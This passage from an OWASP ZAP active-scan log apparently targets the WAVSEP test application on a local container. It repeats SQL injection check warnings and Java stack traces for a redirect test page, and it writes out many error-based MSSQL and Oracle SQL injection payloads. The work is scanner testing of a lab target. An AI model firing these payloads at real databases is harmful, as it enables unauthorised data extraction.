org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680650 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9844=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9844=9844) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('Tvcq'='Tvcq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9844=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9844=9844) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('Tvcq'='Tvcq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680651 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8327=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8327=8327) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- optZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8327=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8327=8327) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- optZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680652 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9989=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9989=9989) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'DKhP'='DKhP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9989=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9989=9989) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'DKhP'='DKhP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680652 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 3039=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3039=3039) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (7006=7006] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3039=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3039=3039) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (7006=7006 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680653 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8226=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8226=8226) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8226=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8226=8226) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680654 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7321=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7321=7321) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7321=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7321=7321) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680655 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 2096=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2096=2096) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('psWd'='psWd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2096=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2096=2096) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('psWd'='psWd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680655 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8030=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8030=8030) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- gmeF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8030=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8030=8030) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- gmeF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680656 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 1350=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1350=1350) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'VtJh'='VtJh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1350=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1350=1350) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'VtJh'='VtJh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680657 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4197=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4197=4197) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6367=6367] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4197=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4197=4197) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6367=6367 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680657 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 8774=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8774=8774) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8774=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8774=8774) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 